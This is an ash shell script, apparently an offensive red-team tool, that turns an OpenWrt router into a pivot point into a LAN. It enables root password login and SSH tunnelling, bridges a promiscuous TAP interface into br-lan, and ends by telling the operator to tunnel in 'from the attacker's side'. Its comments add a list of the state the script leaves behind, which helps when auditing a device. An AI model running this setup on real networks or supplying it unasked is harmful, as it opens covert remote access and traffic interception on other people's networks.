somerset.ash
#!/bin/ash
# somerset.ash: one-shot provisioning script for an OpenWrt device.
# In order, it: installs packages with opkg, stops dnsmasq and uhttpd,
# takes dropbear out of service in favour of OpenSSH sshd, edits sshd_config
# to allow root login and tunnel forwarding, then creates a TAP interface
# (tap0) and adds it to the br-lan bridge.
#
# There is no `set -e` and no exit status is checked, so a failed step
# (e.g. opkg with no network) does not stop the steps after it.
# Presumably meant to be run as root on the device (opkg, uci, init scripts,
# ip link all need it) -- confirm.
#
# State this script leaves behind, useful when auditing a device or a LAN:
#   - openssh-server installed, sshd enabled; dropbear stopped and disabled
#   - sshd_config with PermitRootLogin yes and PermitTunnel yes
#   - dnsmasq and uhttpd not running
#   - tap0 present as a port of br-lan (visible in `brctl show`)
#   - eth0, br-lan and tap0 in promiscuous mode (PROMISC flag in `ip link`)
#
# Banner printed at start-up.
echo "Somerset: Offensive OpenWRT router for Windows Pivoting"
echo "Author: Caster, <[email protected]>"
# Install dependencies. The package index is refreshed first; each package
# is installed by a separate opkg call, and none of the calls is checked.
echo -e "\n [+] Installing necessary tools"
opkg update
# ss: socket statistics tool; it is not invoked anywhere else in this script.
opkg install ss
# kmod-tun: kernel TUN/TAP driver, required for the tap0 device created below.
opkg install kmod-tun
# ip-full: full iproute2 `ip`; presumably needed because the BusyBox `ip`
# applet does not provide `ip tuntap` -- confirm.
opkg install ip-full
opkg install openssh-server
# Stop the DNS/DHCP service (dnsmasq) and the web server (uhttpd).
# Only `stop` is called, not `disable`: the services are halted for the
# current boot but their boot-time enablement is left unchanged, despite
# the "Disabling" wording in the message.
echo -e "\n [+] Disabling DNS and HTTP services"
/etc/init.d/dnsmasq stop
/etc/init.d/uhttpd stop
# Take dropbear out of service so OpenSSH sshd is the only SSH daemon.
# The port is moved to 2222 and dropbear restarted, but it is then stopped
# and disabled straight away, so the net effect is: dropbear not running,
# not started at boot, with Port=2222 left in its UCI config.
echo -e "\n [+] Replacing dropbear..."
uci set dropbear.@dropbear[0].Port=2222
uci commit dropbear
/etc/init.d/dropbear restart
/etc/init.d/dropbear stop
/etc/init.d/dropbear disable
# Edit sshd_config in place. Each substitution matches only the stock
# commented-out default line; if the file already carries a different value
# the sed is a silent no-op and that setting stays as it was.
echo -e "\n [+] Configuring sshd daemon for authentication & tunneling"
# PermitRootLogin yes: root may authenticate with a password, not only a key.
# NOTE(review): `prohibit-password` plus an authorized key would leave a
# smaller exposure on a network-reachable sshd -- confirm whether password
# login is actually required here.
sed -i -e 's/#PermitRootLogin prohibit-password/PermitRootLogin yes/g' /etc/ssh/sshd_config
# PermitTunnel yes: sshd will accept tun/tap device forwarding requests
# from SSH clients.
sed -i -e 's/#PermitTunnel no/PermitTunnel yes/g' /etc/ssh/sshd_config
# Enable sshd at boot and start it; the restart right after start presumably
# makes sure the edited config is loaded if sshd was already running.
/etc/init.d/sshd enable
/etc/init.d/sshd start
/etc/init.d/sshd restart
# Create the layer-2 TAP interface and bridge it into the LAN.
# tap0 is created at runtime with `ip` only; nothing here writes it to the
# UCI network config, so presumably it does not survive a reboot -- confirm.
echo -e "\n [+] Interfaces processing, TAP bridging"
ip tuntap add tap0 mode tap
# Promiscuous mode on the TAP device, the physical port and the bridge, so
# the interfaces accept frames not addressed to their own MAC.
ip link set tap0 promisc on
ip link set eth0 promisc on
ip link set br-lan promisc on
ip link set dev tap0 up
# tap0 becomes a port of br-lan: frames arriving on tap0 are bridged onto
# the LAN segment and LAN frames are bridged out to tap0.
brctl addif br-lan tap0
# Print the bridge table so the operator can check that tap0 was added.
echo -e "\n [*] Current bridge:"
brctl show
# Final message; the script itself opens no tunnel, it only prepares the
# device for one to be initiated from the remote side.
echo -e "\n [*] The script has completed its work. Now initiate an SSH tunnel from the attacker's side"